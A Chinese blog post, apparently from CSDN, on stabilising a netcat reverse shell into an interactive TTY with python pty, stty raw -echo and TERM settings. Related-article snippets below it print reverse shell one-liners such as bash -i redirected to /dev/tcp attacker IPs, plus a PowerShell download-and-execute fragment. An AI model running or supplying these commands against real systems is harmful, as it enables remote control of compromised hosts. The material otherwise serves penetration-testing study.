如何完善反弹的shell

最新推荐文章于 2024-05-09 14:38:44 发布
最新推荐文章于 2024-05-09 14:38:44 发布
阅读量386 收藏
点赞数
分类专栏: 乱七八糟 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/105487795
版权

在渗透过程中,我发现用nc -e反弹的shell一点儿都不好用,我都不会用,特别麻烦,特别容易影响渗透的效率与感情,因此我百度了很多,终于找到了完善反弹shell的方法。

python ‐c "import pty;pty.spawn('/bin/bash')"

python -c 'import pty;pty.spawn("/bin/sh")'
 

使用python提供的pty模块,创建一个原生的终端

Ctrl-C)仍然会关闭终止Netcat,完成标签或历史记录也依旧没有

ctrl + z (后台挂起shell)

stty raw ‐echo

fg + 多个回车   

stty rows 34 cols 136

stty cols 25
把列设为25行,发现输出变窄

export TERM=xterm

 

在kali终端内设置一些stty选项,最终将“哑”netcat shell升级到了一个完全交互的TTY。

stty时一个用来改变并打印终端行设置的常用命令。

stty -a 查看 信息

stty -echo 设置命令不被显示

stty raw #设置原始输入

stty -raw #关闭原始输入

stty size 打印当前终端数和列数

 

shy014
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
各种反弹shell方法总结备忘
weixin_41082546的博客
01-31 884
各种反弹shell方法总结 shell分为两种,一种是正向shell,另一种是反向shell。如果客户端连接服务器,客户端主动连接服务器,就称为正向shell。如果客户端连接服务器,服务器想要获得客户端的shell,就称为反向shell。 反向shell通常在开启了防护措施的目标机器上,例如防火墙、端口转发等。 (1)正向shell 输入如下命令,监听目标主机的4444端口 nc -lvp ...
反弹shell原理和实现
u012830303的博客
01-18 3515
当一些框架和代码,不小心让可执行shell命令的函数存在注入漏洞时,会被利用注入漏洞执行一些shell命令。入侵者为了防止漏洞被修复,无法通过正向链接侵入服务器时,会被利用shell反弹原理种马。 首先,侵入者会利用注入参数,创建一个shell.php文件,文件内容如下 通过web访问并执行shell.php文件 exec('bash -i &> /dev/tcp/10.201.61.194/5566 0>&1'); 这条命令的作用是,在服务器建立一个可以与10.201.61.
【Linux环境下的shell反弹
qq_55213436的博客
07-05 2059
在日常的渗透测试中,当我们拿到一个目标网站的漏洞的时候,往往可以采用shell反弹的方式来进行下一步的操作。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。一般的shell反弹可以结合命令执行漏洞来实现。......
网络安全-反弹shell详解(攻击,检测与防御)_反弹shell原理及防御方法
最新发布
2401_84264491的博客
05-09 619
如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。
Linux下几种反弹Shell方法的总结与理解
weixin_50464560的博客
03-31 1703
Linux下几种反弹Shell方法的总结与理解 - FreeBuf网络安全行业门户 之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。 实验环境 CentOS 6.5:192.168.0.3 kali2.0:
Linux反弹shell姿势复现(一)--- 利用bash反弹shell
weixin_44283446的博客
03-23 2799
反弹shell姿势复现(一)前言复现环境说明反弹shell姿势(一)--- 利用bash反弹shell重要说明方法一方法二 前言     反弹shell有很多种方式,这个系列内容较多,之后也会不断更新,对于反弹shell复现也算是一个近期工作的归纳总结吧。     注意:本博文仅供学习反弹shell的姿势使用,勿作其他用途的参考! 复现环境说明 我在ubuntu和centos上均做了复现,用于比较版本对反弹shell的影响
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
python邮件反弹shell
09-29
使用python反弹shell,根据邮件确定反弹地址
Apache Log4j2 RCE漏洞利用反弹shell合集
good good study
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Windows系统反弹shell常见方法总结
Bird&Bird
07-17 3415
目录一、Powercat反弹shell二、Nishang反弹shell三、UDP反弹shell四、Metasploit反弹shell五、nc反弹 一、Powercat反弹shell powercat下载: powercat. powercat 是一个 函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种: 其一:下载powercat.ps1至本地,并加载 其二:从URL加载 powershell IEX (New-Object System.Net.Webclient).DownloadStri
反弹Shell升级为交互式Shel
weixin_46622976的博客
04-27 1421
前言 经常我们拿到的shell是一个简单的shell 如何把一个简单的shell就升级到一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 普通Shell 给kali弹shell bash -i >& /dev/tcp/192.168.145.128/4444 0>&1 kali:nc -lvvp 4444 然后发现这个shell有很多问题 无法使用vim等文本编辑器 不能补全 不能su 没有向上箭头使用历史 等等 .
python跳转回上条命令_实现交互式shell的几种方式
weixin_29029673的博客
01-30 2060
文章最后更新时间为:2019年06月12日 00:56:19当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念。当我们想使用vim、top等命令时,webshell就无能为力了。那我们怎么获取一个可交互的webshell呢?1. python pty 方式一般我们都会使用nc来接收反弹来的shell,只需要在目标上(以linux为例)执...
bash反弹shell
一个码农的笔记
12-31 1万+
bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1
linux反弹shell总结
redwand的博客
02-22 1416
本文总结了Linux下常用的反弹shell方式,同时说明了交互式shell的得到方法,最后积累了反弹shell语法高亮与tab自动补齐。
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
反弹shell无法反弹
08-13
您好!关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或使用其他技术来绕过防火墙。 2. 端口未开放:如果目标主机的特定端口没有开放,那么反弹shell连接将无法建立。您可以通过扫描目标主机的端口来确定哪些端口是开放的,并调整反弹shell的配置以使用其中一个开放的端口。 3. 网络连接问题:有时候网络连接不稳定或存在其他问题,可能导致反弹shell无法成功。您可以尝试使用其他网络或通过网络工具进行连通性测试,以确保网络连接正常。 4. 权限问题:如果您没有足够的权限来执行反弹shell操作,那么它也可能失败。请确保您具有足够的权限,并尝试以管理员身份运行反弹shell。 请注意,反弹shell是一项潜在的非法活动,我们不鼓励或支持任何非法的行为。以上回答仅供技术讨论和参考,请在合法和合适的环境中使用这些知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值